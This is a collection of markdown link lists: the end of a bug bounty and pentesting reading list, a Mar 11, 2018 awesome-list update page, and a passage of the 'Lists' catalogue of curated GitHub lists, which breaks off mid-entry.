Hacking 101](https://leanpub.com/web-hacking-101) * [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project) * [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn) * [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa) * [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE) * [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900) * [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit) * [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html) * [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html) * [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html) * [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html) * [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html) * [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html) * [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html) * [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html) * [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking) ### Blogs/Websites * http://blog.zsec.uk/101-web-testing-tooling/ * https://blog.innerht.ml * https://blog.zsec.uk * https://www.exploit-db.com/google-hacking-database * https://www.arneswinnen.net * https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102 ### Youtube * [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4) * [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc) * [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8) * [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
# Awesome List Updates on Mar 11, 2018 8 awesome lists updated today. [🏠 Home](/README.md) · [🔍 Search](https://www.trackawesomelist.com/search/) · [🔥 Feed](https://www.trackawesomelist.com/rss.xml) · [📮 Subscribe](https://trackawesomelist.us17.list-manage.com/subscribe?u=d2f0117aa829c83a63ec63c2f&id=36a103854c) · [❤️ Sponsor](https://github.com/sponsors/theowenyoung) ## [1. Awesome ad Free](/content/johnjago/awesome-ad-free/README.md) ### Alternatives / Communication * [Write.as](https://write.as/principles) - Blogging platform that allows you to publish ideas without distraction. ### Resources / Groups * [Digital Public Library Project](http://no-ads.ca/) - Promotes a Digital Public Library system that can replace advertising funded media. ## [2. Awesome Free Software](/content/johnjago/awesome-free-software/README.md) ### Software / Web Applications * [PeerTube](https://framagit.org/chocobozzz/PeerTube) - Decentralized video streaming service. ([GNU AGPLv3](https://framagit.org/chocobozzz/PeerTube/blob/develop/LICENSE)) ### Resources / Organizations * [April](https://www.april.org/) - Promouvoir et défendre le logiciel libre. ## [3. Awesome D3](/content/wbkd/awesome-d3/README.md) ### Utils / Third Party * [crossfilter (⭐1.7k)](https://github.com/crossfilter/crossfilter) - Library for exploring large multivariate datasets ## [4. Awesome Dev Fun](/content/mislavcimpersak/awesome-dev-fun/README.md) ### JavaScript * [undefined-is-a-function (⭐238)](https://github.com/donavon/undefined-is-a-function) - "undefined is not a function"? — It is now! ### SaaS * ~~[Booleans as a Service](https://booleans.io/) - Create, read, update & delete boolean.~~ ## [5. Android Security Awesome](/content/ashishb/android-security-awesome/README.md) ### Tools / Static Analysis Tools * [StaCoAn (⭐786)](https://github.com/vincentcox/StaCoAn) - Crossplatform tool which aids developers, bugbounty hunters and ethical hackers performing static code analysis on mobile applications. This tool was created with a big focus on usability and graphical guidance in the user interface. ## [6. Awesome Ctf](/content/apsdehal/awesome-ctf/README.md) ### Attacks * [Bettercap (⭐12k)](https://github.com/bettercap/bettercap) - Framework to perform MITM (Man in the Middle) attacks. ## [7. Awesome Dart](/content/yissachar/awesome-dart/README.md) ### Community * [Facebook Group (pt-BR)](https://www.facebook.com/groups/dartlangbr) ## [8. Awesome Aws](/content/donnemartin/awesome-aws/README.md) ### Social / Blogs * [AWS Geek](https://www.awsgeek.com/) ### Social / Twitter Influencers * [@awsgeek](https://twitter.com/awsgeek) --- - Prev: [Mar 12, 2018](/content/2018/03/12/README.md) - Next: [Mar 10, 2018](/content/2018/03/10/README.md)
# Lists List of useful, silly and [awesome](#awesome-) lists curated on GitHub. Contributions welcome! ✨ Now also available [in CSV](https://github.com/jnv/lists/blob/gh-pages/lists.csv)! ✨ - [Lists](#lists) - [Non-technical](#non-technical) - [Technical](#technical) - [awesome-*](#awesome-) - [Lists of lists](#lists-of-lists) - [Lists of lists of lists](#lists-of-lists-of-lists) - [Lists of lists of lists of lists](#lists-of-lists-of-lists-of-lists) - [Lists of lists of lists of lists of lists](#lists-of-lists-of-lists-of-lists-of-lists) - [Lists of lists of lists of lists of lists of lists](#lists-of-lists-of-lists-of-lists-of-lists-of-lists) - [Lists of lists of lists of lists of lists of lists of lists](#lists-of-lists-of-lists-of-lists-of-lists-of-lists-of-lists) - [License](#license) <!-- lists-start --> ## Non-technical * [4dayweek](https://github.com/rafaelcamargo/4dayweek) – Companies friendly to the 4-day workweek. - https://4dayweek.rafaelcamargo.com/ * [aero-structures](https://github.com/specifics/aero-structures) – Resources for analyzing aircraft structures for aerospace engineers. * [aksh](https://github.com/svaksha/aksh) – Bibliography of STEM (Science, Technology, Engineering & Mathematics) resources and grey literature. * [amas](https://github.com/sindresorhus/amas) – Awesome & Marvelous Amas (Ask Me Anything) on GitHub * [Annual-Reading-List](https://github.com/davidskeck/Annual-Reading-List) – Things to read every year. * [awesomebandnames](https://github.com/jnv/awesomebandnames) – The open-source list of awesome band names. * [awesome-belarus-online](https://github.com/Friz-zy/awesome-belarus-online) – Useful belarusian online resources. * [awesome-biology](https://github.com/raivivek/awesome-biology) – Learning resources, research papers, tools and other resources related to Biology. * [awesome-board-games](https://github.com/edm00se/awesome-board-games) – Awesome and exceptional board games - https://awesomeboard.games * [awesome-ethics](https://github.com/HussainAther/awesome-ethics) * [awesome-fantasy](https://github.com/RichardLitt/awesome-fantasy) – Fantasy literature worth reading. * [awesome-gif](https://github.com/Kikobeats/awesome-gif) – GIF /dʒ/ links and resources. * [awesome-glasgow](https://github.com/allyjweir/awesome-glasgow) – Some highlights around Glasgow, Scotland. * [awesome-hacking-locations](https://github.com/daviddias/awesome-hacking-locations) – Hacking places, organised by Country and City, listing if it features power and wifi. * [awesome-health](https://github.com/prabhic/awesome-health) – Useful health resources. * [awesome-images](https://github.com/heyalexej/awesome-images) – Free (stock) photo resources for your projects. * [awesome-kimchi](https://github.com/jeyraof/awesome-kimchi) – Kimchi of the people, by the people, for the people. * [awesome-lego](https://github.com/ad-si/awesome-lego) * [awesome-lockpicking](https://github.com/fabacab/awesome-lockpicking) – Guides, tools, and other resources related to the security and compromise of locks, safes, and keys. * [awesome-maps](https://github.com/simsieg/awesome-maps) – Various Online Maps * [awesome-mental-health](https://github.com/dreamingechoes/awesome-mental-health) – Articles, websites and resources about mental health in the software industry. - https://dreamingechoes.github.io/awesome-mental-health * [awesome-parasite](https://github.com/ecohealthalliance/awesome-parasite) – Parasites and host-pathogen interactions. * [awesome-philosophy](https://github.com/HussainAther/awesome-philosophy) – Philosophy * [awesome-reddit-channels](https://github.com/MadhuNimmo/awesome-reddit-channels) – Reddit Channels every programmer must follow. * [awesome-scifi](https://github.com/sindresorhus/awesome-scifi) – Sci-Fi worth consuming. * [awesome-space](https://github.com/elburz/awesome-space) – Outer Space. * [awesome-space-books](https://github.com/Hunter-Github/awesome-space-books) – Space exploration related book. * [awesome-speaking](https://github.com/matteofigus/awesome-speaking) – Resources about public speaking * [awesome-stock-resources](https://github.com/neutraltone/awesome-stock-resources) – Stock photography, video and illustration websites. * [awesome-theravada](https://github.com/johnjago/awesome-theravada) – Theravada Buddhist teachings * [awesome-uncopyright](https://github.com/johnjago/awesome-uncopyright) – All things public domain * [awesome-webcomics](https://github.com/dhamaniasad/awesome-webcomics) * [baby-sleep](https://github.com/simple10/baby-sleep) – Baby sleep guides curated from the best of the Internet. * [bailfunds.github.io](https://github.com/bailfunds/bailfunds.github.io) – Bail Funds for Protestors across the USA. - https://bailfunds.github.io/ * [boardgames](https://gitlab.com/gamearians/boardgames) – Boardgames and boardgame-related projects that can be found on GitHub. * [chinese-poetry](https://github.com/chinese-poetry/chinese-poetry) _In Chinese_ – The most comprehensive database of Chinese poetry - http://shici.store * [cocktails](https://github.com/balevine/cocktails) – Cocktail Recipes * [corporate-logos](https://github.com/marketreef/corporate-logos) – Curated repo of publicly listed co. logos, identified by ticker. *Almost 1500 logos* * [creative-commons-media](https://github.com/shime/creative-commons-media) – Audio, graphics and other resources that provide media licensed under Creative Commons licenses. * [discord-listings](https://github.com/angrymouse/discord-listings) – Places where to promote Discord servers. * [dissertation-tips](https://github.com/katychuang/dissertation-tips) – Resources to help PhD students complete their dissertation successfully. * [diversity-index](https://github.com/svaksha/diversity-index) – Grants, scholarships and FA that encourages diversity in STEM fields aimed at half the world's population, Women! - http://svaksha.github.io/diversity-index * [diversity-twitter](https://github.com/gregorycoleman/diversity-twitter) – Twitter feeds of interesting people to follow for Diversity & Inclusion * [food](https://notabug.org/themusicgod1/food) * [food-recipes](https://github.com/obfuscurity/food-recipes) – Honest-to-goodness "real food" recipes * [frequent-transit-maps](https://github.com/wwcline/list-of-frequent-transit-maps) – Transit maps highlighting frequent all-day service * [global-reports](https://github.com/andressoop/global-reports) – Major global reports published by international organisations * [guitarspecs](https://github.com/gitfrage/guitarspecs) – Electric guitar's parts specs - https://gitfrage.github.io/guitarspecs/ * [isaacs/reading-list](https://github.com/isaacs/reading-list) – [isaac](https://github.com/isaacs)'s reading list. * [lawrence-veggie](https://github.com/codysoyland/lawrence-veggie) – Vegetarian/vegan restaurants in Lawrence, KS. * [lawyersongithub](https://github.com/dpp/lawyersongithub) – A club full of lawyers who also have GitHub accounts. * [low-resource-languages](https://github.com/RichardLitt/low-resource-languages) – Conservation, development, and documentation of endangered, minority, and low or under-resourced human languages. * [Mind-Expanding-Books](https://github.com/hackerkid/Mind-Expanding-Books) – :books: Books that will blow your mind - http://books.vishnuks.com * [mining-resources](https://github.com/Mining-Resources/mining-resources) – Natural resources mining. * [no-free-basics](https://github.com/net-neutrality/no-free-basics) – Those who have spoken up against Facebook's “Free Basics” - https://net-neutrality.github.io/no-free-basics/ * [open-sustainable-technology](https://github.com/protontypes/open-sustainable-technology) – Worldwide open technology projects preserving a stable climate, energy supply and vital natural resources. * [plastic-free](https://github.com/IrosTheBeggar/plastic-free) – Plastic-free products. * [ProjectSoundtracks](https://github.com/sarthology/ProjectSoundtracks) – Soundtracks to boost your Productivity and Focus. * [PublicMedia](https://github.com/melodykramer/PublicMedia) – Everything about public (broadcast) media. - Also [an introduction to working with GitHub](https://melodykramer.github.io/2015/04/06/learning-github-without-one-line-of-code) for non-programmers. * [recipes](https://github.com/bzimmerman/recipes) by @bzimmerman – This repository contains tasty open-source recipes. * [recipes](https://github.com/csswizardry/recipes) by @csswizardy – Collection of things I like cooking * [recipes](https://github.com/LarryMad/recipes) by @LarryMad * [recipes](https://github.com/schacon/recipes) by @schacon * [recipes](https://github.com/silizuo/recipes) _In Chinese and English_ by @silizuo * [sf-vegetarian-restaurants](https://github.com/mojombo/sf-vegetarian-restaurants) – Awesome vegetarian-friendly restaurants in SF * [shelfies](https://github.com/kyro/shelfies) – Bookshelves of awesome people, community-transcribed. * [SiliconValleyThingsToDo](https://github.com/cjbarber/SiliconValleyThingsToDo) – Things to do and activities within Silicon Valley. * [stayinghomeclub](https://github.com/phildini/stayinghomeclub) – All the companies working from home or events changed because of covid-19. - https://stayinghome.club * [Sustainable-Earth](https://github.com/bizz84/Sustainable-Earth) – All things sustainable * [tacofancy](https://github.com/sinker/tacofancy) – community-driven taco repo. stars stars stars. * [teesites](https://github.com/elder-cb/teesites) – Great sites to buy awesome t-shirts and other cool stuff. * [warren](https://github.com/torchhound/warren) – Interesting and deep corners of the internet to explore. ## Technical * [101](https://github.com/ojas/101) – Resources on running a software biz. * [10PL](https://github.com/nuprl/10PL) – 10 papers that all PhD students in programming languages ought to know, for some value of 10. * [1on1-questions](https://github.com/VGraupera/1on1-questions) – 1 on 1 meeting questions. * [30-seconds-of-code](https://github.com/30-seconds/30-seconds-of-code) – JavaScript snippets you can understand in 30 seconds or less. - https://30secondsofcode.org/ * [30-seconds-of-interviews](https://github.com/30-seconds/30-seconds-of-interviews) – Common interview questions to help you prepare for your next interview. * [a11yproject.com](https://github.com/a11yproject/a11yproject.com) – A community–driven effort to make web accessibility easier. - https://a11yproject.com * [addinslist](https://github.com/daattali/addinslist) – Useful [RStudio](https://www.rstudio.com/) addins * [admesh-projects](https://github.com/admesh/admesh-projects) – Projects using [ADMesh](https://github.com/admesh/admesh) (a triangulated solid meshes processor). * [AI-reading-list](https://github.com/m0nologuer/AI-reading-list) – Papers about Artificial Intelligence. * [alexandria](https://github.com/alxgcrz/alexandria) _In English and Spanish_ – Various resources by [@alxgcrz](https://github.com/alxgcrz) * [algovis](https://github.com/enjalot/algovis) – Algorithm Visualization. * [alternative-front-ends](https://github.com/mendel5/alternative-front-ends) – Alternative open source front-ends for popular internet platforms (e.g. YouTube, Twitter, etc.). * [alternative-internet](https://github.com/redecentralize/alternative-internet) – A collection of interesting new networks and tech aiming at decentralisation (in some form). * [amazing-deployment](https://github.com/delirehberi/amazing-deployment) * [android-awesome-libraries](https://github.com/kaiinui/android-awesome-libraries) – Useful Android development libraries with usage examples. * [android-dev-readme](https://github.com/anirudh24seven/android-dev-readme) – Links for every Android developer. * [AndroidDevTools](https://github.com/inferjay/AndroidDevTools) _In Chinese_ – SDK, development tools, libraries, and resources. - http://www.androiddevtools.cn/ * [android-jobs](https://github.com/android-cn/android-jobs) _In Chinese_ – Android positions in China. * [Android-Learning-Resources](https://github.com/zhujun2730/Android-Learning-Resources) _In Chinese_ – Learning resources for Android. * [android-open-project](https://github.com/Trinea/android-open-project) _In Chinese_ – Collect and classify android open source projects. * [android-security-awesome](https://github.com/ashishb/android-security-awesome) – “A lot of work is happening in academia and industry on tools to perform dynamic analysis, static analysis and reverse engineering of android apps.” * [android-tech-frontier](https://github.com/hehonghui/android-tech-frontier) _In Chinese_ – Translation of articles about Android development. * [angular-education](https://github.com/timjacobi/angular-education) – Helpful material to develop using Angular * [AngularJS-Learning](https://github.com/jmcunningham/AngularJS-Learning) * [ansible-gentoo-roles](https://github.com/jirutka/ansible-gentoo-roles) – Ansible roles for Gentoo Linux. * [apis-list](https://github.com/apis-list/apis-list) – Community maintained, human and machine readable list of Public APIs * [app-ideas](https://github.com/florinpop17/app-ideas) – Application ideas which can be used to improve your coding skills. * [app-launch-guide](https://github.com/adamwulf/app-launch-guide) – Indie dev's definitive guide to building and launching your app, including pre-launch, marketing, building, QA, buzz building, and launch. * [applied-ml](https://github.com/eugeneyan/applied-ml) – Data science & machine learning in production. * [APTnotes](https://github.com/kbandla/APTnotes) – Various public documents, whitepapers and articles about APT [Advanced persistent threat] campaigns. * [architect-awesome](https://github.com/xingshaocheng/architect-awesome) _In Chinese_ – 后端架构师技术图谱 * [asynchronous-php](https://github.com/elazar/asynchronous-php) – Asynchronous programming in PHP. * [Automated-SPA-Testing](https://github.com/webpro/Automated-SPA-Testing) – Automated unit & functional testing for web applications [JavaScript et al.]. * [automatic-api](https://github.com/dbohdan/automatic-api) – Software that turns your database into a REST/GraphQL API. * [awful-ai](https://github.com/daviddao/awful-ai) – Current scary usages of AI, hoping to raise awareness to its misuses in society. * [awful-oss-incidents](https://github.com/PayDevs/awful-oss-incidents) – Incidents caused by unappreciated OSS maintainers or underfunded OSS projects. * [awmy](https://github.com/potch/awmy) – Are We Meta Yet? - http://arewemetayet.com/ * [b1fipl](https://github.com/marcpaq/b1fipl) – A Bestiary of Single-File Implementations of Programming Languages. * [Backpack](https://github.com/sevab/Backpack) – Various learning resources, organized by technology/topic. * [badass-dev-resources](https://github.com/sodevious/badass-dev-resources) – #bada55 front-end developer resources. * [Badges4-README.md-Profile](https://github.com/alexandresanlim/Badges4-README.md-Profile) – Badges for GitHub profiles. * [bangalore-startups](https://github.com/hemanth/bangalore-startups) – Startups in Bangalore. * [beautiful-docs](https://github.com/PharkMillups/beautiful-docs) – Pointers to useful, well-written, and otherwise beautiful documentation. * [BEM-resources](https://github.com/sturobson/BEM-resources) * [Best-App](https://github.com/hzlzh/Best-App) _In Chinese_ – Recommendations for best desktop and mobile apps. * [best-of-awesomeness-and-usefulness-for-webdev](https://github.com/Pestov/best-of-awesomeness-and-usefulness-for-webdev) – Digest of the most useful tools and resources for the last year. - [Russian version](https://github.com/Pestov/best-of-awesomeness-and-usefulness-for-webdev/tree/master/ru) * [best-practices-checklist](https://github.com/palash25/best-practices-checklist) – Language-specific resources to look up the best practices followed by that particular language's community. * [Best-websites-a-programmer-should-visit](https://github.com/sdmg15/Best-websites-a-programmer-should-visit) – Some useful websites for programmers. * [Best-websites-a-programmer-should-visit-zh](https://github.com/tuteng/Best-websites-a-programmer-should-visit-zh) _In Chinese_ – 程序员应该访问的最佳网站中文版 * [Big-Ass-Data-Broker-Opt-Out-List](https://github.com/yaelwrites/Big-Ass-Data-Broker-Opt-Out-List) – Data brokers and how to opt out from trading your personal information. * [bigdata-ecosystem](https://github.com/zenkay/bigdata-ecosystem) – Big-data related projects packed into a JSON dataset. - http://bigdata.andreamostosi.name/ * [Big-List-of-ActivityPub](https://github.com/shleeable/Big-List-of-ActivityPub) – ActivityPub Projects * [big-list-of-naughty-strings](https://github.com/minimaxir/big-list-of-naughty-strings) – Strings which have a high probability of causing issues when used as user-input data. * [bioinformatics-compbio-tools](https://github.com/lancelafontaine/bioinformatics-compbio-tools) – Bioinformatics and computational biology tools. * [bitcoin-reading-list](https://github.com/jashmenn/bitcoin-reading-list) – Learn to program Bitcoin transactions. * [BNN-ANN-papers](https://github.com/takyamamoto/BNN-ANN-papers) – Papers about Biological and Artificial Neural Networks related to (Computational) Neuroscience * [bookmarklets](https://github.com/RadLikeWhoa/bookmarklets) – Bookmarklets that are useful on the web - https://sacha.me/bookmarklets/ * [bookshelf](https://github.com/OpenTechSchool/bookshelf) – Reading lists for learners. * [bots](https://github.com/hackerkid/bots) – Tools for building bots * [breakfast-repo](https://github.com/ashleygwilliams/breakfast-repo) – Videos, recordings, and podcasts to accompany our morning coffee. * [browser-resources](https://github.com/azu/browser-resources) – Latest JavaScript information by browser. * [build-your-own-x](https://github.com/danistefanovic/build-your-own-x) – Build your own (insert technology here) * [channels](https://github.com/andrew--r/channels) _In Russian_ – YouTube channels for web developers. * [citizen-science](https://github.com/dylanrees/citizen-science) – Scientific tools to empower communities and/or practice various forms of non-institutional science * [classics](https://github.com/eyy/classics) – Classical studies (Latin and Ancient Greek) resources: software, code and raw data. * [classless-css](https://github.com/dbohdan/classless-css) – Classless CSS themes/frameworks. * [Clone-Wars](https://github.com/GorvGoyl/Clone-Wars) – Open-source clones of popular sites. * [cloud-conferences](https://github.com/stefan-kolb/cloud-conferences) – A collection of scientific and industry conferences focused on cloud computing. - http://stefan-kolb.github.io/cloud-conferences/ * [code-canon](https://github.com/darius/code-canon) – Code worth reading. * [codeface](https://github.com/chrissimpkins/codeface) – Typefaces for source code / text editors. * [Colorful](https://github.com/Siddharth11/Colorful) – Choose your next color scheme * [CompilerJobs](https://github.com/mgaudet/CompilerJobs) – Compiler, language, and runtime teams for people looking for jobs in this area. * [compilers-targeting-c](https://github.com/dbohdan/compilers-targeting-c) – Compilers that can generate C code. * [computer-science](https://github.com/ossu/computer-science) – Path to a free self-taught graduation in Computer Science. * [content-management-systems](https://github.com/ahadb/content-management-systems) – Open source & proprietary content management systems. * [critical-path-css-tools](https://github.com/addyosmani/critical-path-css-tools) – Tools to help prioritize above-the-fold CSS. * [CryptoList](https://github.com/coinpride/CryptoList) – Blockchain & cryptocurrency resources. * [crypto-might-not-suck](https://github.com/sweis/crypto-might-not-suck) – Crypto Projects that Might not Suck. * [cscs](https://github.com/SalGnt/cscs) – Coding Style Conventions and Standards. * [css-in-js](https://github.com/MicheleBertoli/css-in-js) – CSS in JS techniques comparison for React et al. * [css-protips](https://github.com/AllThingsSmitty/css-protips) – Take your CSS skills pro * [cs-video-courses](https://github.com/Developer-Y/cs-video-courses) – Computer Science courses with video lectures. * [cto](https://github.com/92bondstreet/cto) – Chief Technology Officers resources. * [curated-list-espresso-sugar-plugins](https://github.com/GioSensation/curated-list-espresso-sugar-plugins) – Sugar plugins for Espresso, the code editor by MacRabbit. * [curated-programming-resources](https://github.com/Michael0x2a/curated-programming-resources) – Resources for learning programming and computer science. * [curatedseotools](https://github.com/sneg55/curatedseotools) – Best SEO Tools Stash - https://curatedseotools.com * [cycle-ecosystem](https://github.com/Widdershin/cycle-ecosystem) – What are the most popular and trending libraries for [Cycle.js](http://cycle.js.org/)? * [dad-jokes](https://github.com/wesbos/dad-jokes) – Dad style programming jokes. * [dark-knowledge](https://github.com/prescience-data/dark-knowledge) – Research papers and presentations for counter-detection and web privacy enthusiasts. * [datajournalists-toolbox](https://github.com/basilesimon/datajournalists-toolbox) – Tools for datajournalists, with examples and gists. * [datascience](https://github.com/r0f1/datascience) – Python resources for data science. * [data-science-blogs](https://github.com/rushter/data-science-blogs) * [data-science-must-watch](https://github.com/kmonsoor/data-must-watch) * [datasciencemasters](https://github.com/datasciencemasters/go) – The Curriculum for learning Data Science, Open Source and at your fingertips. - http://datasciencemasters.org/ * [datascience-pizza](https://github.com/PizzaDeDados/datascience-pizza) _In Portugese_ – Materiais de estudo em análise de dados e áreas afins, empresas que trabalham com dados e dicionário de conceitos. * [DataSciencePython](https://github.com/ujjwalkarn/DataSciencePython) – Python tutorials for Data Science, NLP and Machine Learning * [debugging-stories](https://github.com/danluu/debugging-stories) – Collection of links to various debugging stories. * [Deep-NLP-Resources](https://github.com/pawangeek/Deep-NLP-Resources) – Deep Natural Language Processing * [degoogle](https://github.com/tycrek/degoogle) – Alternatives to Google's products. * [delightful-fediverse-apps](https://codeberg.org/fediverse/delightful-fediverse-apps) – Applications for the Fediverse that are based on the ActivityPub protocol and related standards. * [delightful-libre-hosters](https://codeberg.org/jonatasbaldin/delightful-libre-hosters) – People and organizations who deploy, maintain and offer open source services to the public. * [Developer-Conferences](https://github.com/MurtzaM/Developer-Conferences) – Upcoming developer conferences. * [developers-conferences-agenda](https://github.com/scraly/developers-conferences-agenda) - https://developers.events/ * [dev-movies](https://github.com/aryaminus/dev-movies) – Recommended movies for people working in the Software and IT Industry. * [devopsbookmarks.com](https://github.com/devopsbookmarks/devopsbookmarks.com) – To discover tools in the devops landscape. - http://www.devopsbookmarks.com/ * [devops_resources](https://github.com/dustinmm80/devops_resources) * [dev-resource](https://github.com/Ibrahim-Islam/dev-resource) – Resources for devs online and offline. * [digital-gardeners](https://github.com/MaggieAppleton/digital-gardeners) – Resources for gardeners tending their digital notes on the public interwebs. * [discord-open-source](https://github.com/discord/discord-open-source) – Open source communities living on Discord. * [discord-resources](https://github.com/DTinker/discord-resources) – Discord modding resources. * [discount-for-student-dev](https://github.com/AchoArnold/discount-for-student-dev) – Discounts on software (SaaS, PaaS, IaaS, etc.) and other offerings for developers who are students * [dive-into-machine-learning](https://github.com/hangtwenty/dive-into-machine-learning) – Dive into Machine Learning with Python Jupyter notebook and scikit-learn - http://hangtwenty.github.io/dive-into-machine-learning/ * [django-must-watch](https://gitlab.com/rosarior/django-must-watch) – Must-watch videos about Django web framework + Python. * [DL4NLP](https://github.com/andrewt3000/DL4NLP) – Deep Learning for Natural Language Processing resources. * [dumb-password-rules](https://github.com/dumb-password-rules/dumb-password-rules) – Shaming sites with dumb password rules. * [easy-application](https://github.com/j-delaney/easy-application) – Software engineering companies that are easy to apply to. * [edge-ai](https://github.com/crespum/edge-ai) – Embedded / Edge AI * [effects-bibliography](https://github.com/yallop/effects-bibliography) – A collaborative bibliography of work related to the theory and practice of computational effects * [ElixirBooks](https://github.com/sger/ElixirBooks) – Elixir programming language books * [elm-companies](https://github.com/jah2488/elm-companies) – Companies using Elm * [embedded-scripting-languages](https://github.com/dbohdan/embedded-scripting-languages) * [ember-links/list](https://github.com/ember-links/list) – Ember.js web framework * [empathy-in-engineering](https://github.com/KimberlyMunoz/empathy-in-engineering) – Building and promoting more compassionate engineering cultures * [engineering-blogs](https://github.com/kilimchoi/engineering-blogs) * [engine.so](https://github.com/pmwkaa/engine.so) – Tracking, Benchmarking and Sharing Information about an open source embedded data storage engines, internals, architectures, data storage and transaction processing. * [erlang-bookmarks](https://github.com/0xAX/erlang-bookmarks) – All about erlang programming language. * [erlang-watchlist](https://github.com/gabrielelana/erlang-watchlist) – Where to find good code to master Erlang idioms * [ES6-Learning](https://github.com/ericdouglas/ES6-Learning) – Resources to learn ECMAScript 6! * [es6-tools](https://github.com/addyosmani/es6-tools) – An aggregation of tooling for ES6 * [Essential-JavaScript-Links](https://github.com/starandtina/Essential-JavaScript-Links) - http://starandtina.github.io/Essential-JavaScript-Links/ * [every-programmer-should-know](https://github.com/mtdvio/every-programmer-should-know) – (Mostly) technical things every software developer should know. * [Facets](https://github.com/O-I/Facets) – One-liners in Ruby * [fks](https://github.com/JacksonTian/fks) _In Chinese_ – Frontend Knowledge Structure. * [flat-file-cms](https://github.com/ahadb/flat-file-cms) – Stictly flat-file cms systems. * [forced-alignment-tools](https://github.com/pettarin/forced-alignment-tools) – Forced alignment (synchronization of speech with text) * [FOSS-for-Dev](https://github.com/tvvocold/FOSS-for-Dev) – Free and open-source software for developers * [freeCodeCamp](https://github.com/freeCodeCamp/freeCodeCamp) – Open Source, Free Full Stack Training with hours of coding challenges, projects, and certifications. - https://www.freecodecamp.org/ * [free-for-dev](https://github.com/ripienaar/free-for-dev) – Software, SaaS, PaaS etc offerings that have free tiers for devs. - https://free-for.dev/ * [free-programming-books](https://github.com/EbookFoundation/free-programming-books) - http://resrc.io/list/10/list-of-free-programming-books/ * [free-programming-books-zh_CN](https://github.com/justjavac/free-programming-books-zh_CN) _In Chinese_ * [frontdesk](https://github.com/miripiruni/frontdesk) – Useful things for Front End Developers * [Front-end-Developer-Interview-Questions](https://github.com/h5bp/Front-end-Developer-Interview-Questions) – Helpful front-end related questions you can use to interview potential candidates, test yourself or completely ignore. - Available in [various translations](https://github.com/darcyclarke/Front-end-Developer-Interview-Questions/tree/master/Translations) * [Front-end-Web-Development-Interview-Question](https://github.com/paddingme/Front-end-Web-Development-Interview-Question) _In Chinese_ * [Front-End-Web-Development-Resources](https://github.com/RitikPatni/Front-End-Web-Development-Resources) - https://resources.ritikpatni.me/ * [frontend-case-studies](https://github.com/andrew--r/frontend-case-studies) – Technical talks and articles about real world enterprise frontend development. * [frontend-challenges](https://github.com/felipefialho/frontend-challenges) – Playful challenges for job applicants to test your knowledge. * [frontend-dev-bookmarks](https://github.com/dypsilon/frontend-dev-bookmarks) – Frontend development resources I collected over time. * [frontend-dev-resources](https://github.com/dmytroyarmak/frontend-dev-resources) – Frontend resources [conferences]. * [frontend-developer-resources](https://github.com/mrcodedev/frontend-developer-resources) _In Spanish._ – El camino del Frontend Developer. * [frontend-development](https://github.com/mojpm/frontend-development) * [frontend-resources](https://github.com/JonathanZWhite/frontend-resources) by @JonathanZWhite * [frontend-resources](https://github.com/zedix/frontend-resources) by @zedix * [frontend-stuff](https://github.com/moklick/frontend-stuff) – Framework/libraries/tools to use when building things on the web. Mostly Javascript stuff. * [frontend-tools](https://github.com/codylindley/frontend-tools) – Tools for frontend (i.e. html, js, css) desktop/laptop (i.e. does not include tablet or phone yet) web development * [fsharp-companies](https://github.com/Kavignon/fsharp-companies) – Companies that use F# * [game-datasets](https://github.com/leomaurodesenv/game-datasets) – Game datasets, tools for artificial intelligence in games * [Game-Networking-Resources](https://github.com/MFatihMAR/Game-Networking-Resources) – Game Network Programming * [games](https://github.com/leereilly/games) – Popular/awesome videos games, add-on, maps, etc. hosted on GitHub. * [generated-awesomeness](https://github.com/orsinium-labs/generated-awesomeness) – Awesome list autogenerated from GitHub API. * [git-cheat-sheet](https://github.com/arslanbilal/git-cheat-sheet) – git and git flow cheat sheet - http://bilalarslan.me/git-cheat-sheet/ * [github-cheat-sheet](https://github.com/tiimgreen/github-cheat-sheet) – Cool features of Git and GitHub. * [github-drama](https://github.com/nikolas/github-drama) * [github-hall-of-fame](https://github.com/mehulkar/github-hall-of-fame) – Hall of Fame for spectacular things on Github. * [GoBooks](https://github.com/dariubs/GoBooks) – Golang books. * [go-is-not-good](https://github.com/ksimka/go-is-not-good) – Articles that complain about Golang's imperfection. * [go-must-watch](https://github.com/sauravtom/go-must-watch) – Must-watch videos about Golang. * [go-patterns](https://github.com/tmrts/go-patterns) – Go design patterns, recipes and idioms - http://tmrts.com/go-patterns * [graph-adversarial-learning-literature](https://github.com/YingtongDou/graph-adversarial-learning-literature) – Adversarial learning papers on graph-structured data. * [graphics-resources](https://github.com/mattdesl/graphics-resources) – Game development and realtime graphics programming. * [graphql-apis](https://github.com/IvanGoncharov/graphql-apis) – Public GraphQL APIs. * 